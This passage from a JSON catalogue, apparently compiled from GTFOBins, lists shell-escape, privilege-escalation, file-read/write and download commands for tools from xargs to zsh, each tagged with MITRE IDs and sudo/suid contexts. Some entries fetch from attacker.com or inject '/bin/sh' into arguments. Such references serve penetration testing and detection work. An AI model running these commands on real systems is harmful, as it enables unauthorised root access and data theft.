-p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:1:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:1:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:1:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:2:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:2:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:2:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xdg-user-dir:shell:0:sudo","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"]},{"id":"gtfo:xdg-user-dir:shell:0:unprivileged","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"]},{"id":"gtfo:xdotool:shell:0:sudo","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdotool/"]},{"id":"gtfo:xdotool:shell:0:suid","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xdotool/"]},{"id":"gtfo:xdotool:shell:0:unprivileged","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdotool/"]},{"id":"gtfo:xmodmap:file-read:0:sudo","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmodmap/"]},{"id":"gtfo:xmodmap:file-read:0:suid","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmodmap/"]},{"id":"gtfo:xmodmap:file-read:0:unprivileged","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmodmap/"]},{"id":"gtfo:xmore:file-read:0:sudo","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmore/"]},{"id":"gtfo:xmore:file-read:0:suid","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmore/"]},{"id":"gtfo:xmore:file-read:0:unprivileged","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmore/"]},{"id":"gtfo:xpad:file-read:0:sudo","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xpad/"]},{"id":"gtfo:xpad:file-read:0:suid","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xpad/"]},{"id":"gtfo:xpad:file-read:0:unprivileged","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xpad/"]},{"id":"gtfo:xxd:file-read:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-read:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-read:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-write:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-write:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xxd:file-write:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"]},{"id":"gtfo:xz:file-read:0:sudo","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xz/"]},{"id":"gtfo:xz:file-read:0:suid","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xz/"]},{"id":"gtfo:xz:file-read:0:unprivileged","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xz/"]},{"id":"gtfo:yarn:shell:0:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:0:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:1:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:1:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:2:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yarn:shell:2:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"]},{"id":"gtfo:yash:shell:0:sudo","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yash/"]},{"id":"gtfo:yash:shell:0:suid","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/yash/"]},{"id":"gtfo:yash:shell:0:unprivileged","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yash/"]},{"id":"gtfo:yelp:file-read:0:sudo","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yelp/"]},{"id":"gtfo:yelp:file-read:0:unprivileged","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yelp/"]},{"id":"gtfo:yt-dlp:shell:0:sudo","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"]},{"id":"gtfo:yt-dlp:shell:0:unprivileged","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"]},{"id":"gtfo:yum:command:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"yum localinstall -y x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install .x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"]},{"id":"gtfo:yum:download:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"yum install http://attacker.com/path/to/input-file.rpm","description":"The file on the remote host must have the `.rpm` extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp/yum-root-xxxxxx/`.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"]},{"id":"gtfo:yum:inherit:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"cat >/path/to/temp-dir/x<<EOF\n[main]\nplugins=1\npluginpath=/path/to/temp-dir/\npluginconfpath=/path/to/temp-dir/\nEOF\n\ncat >/path/to/temp-dir/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\ncat >/path/to/temp-dir/y.py<<EOF\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n ...\nEOF\n\nyum -c /path/to/temp-dir/x --enableplugin=y","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"]},{"id":"gtfo:zathura:shell:0:sudo","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zathura/"]},{"id":"gtfo:zathura:shell:0:unprivileged","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zathura/"]},{"id":"gtfo:zcat:file-read:0:sudo","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zcat/"]},{"id":"gtfo:zcat:file-read:0:unprivileged","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zcat/"]},{"id":"gtfo:zgrep:file-read:0:sudo","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zgrep/"]},{"id":"gtfo:zgrep:file-read:0:unprivileged","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zgrep/"]},{"id":"gtfo:zic:command:0:sudo","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zic/"]},{"id":"gtfo:zic:command:0:suid","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zic/"]},{"id":"gtfo:zic:command:0:unprivileged","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zic/"]},{"id":"gtfo:zip:file-read:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:file-read:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:file-read:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:shell:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:shell:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zip:shell:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"]},{"id":"gtfo:zless:inherit:0:sudo","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zless/"]},{"id":"gtfo:zless:inherit:0:suid","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zless/"]},{"id":"gtfo:zless:inherit:0:unprivileged","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zless/"]},{"id":"gtfo:zsh:download:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:download:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:download:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:1:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:1:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"]},{"id":"gtfo:zsh:file-read:1:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c 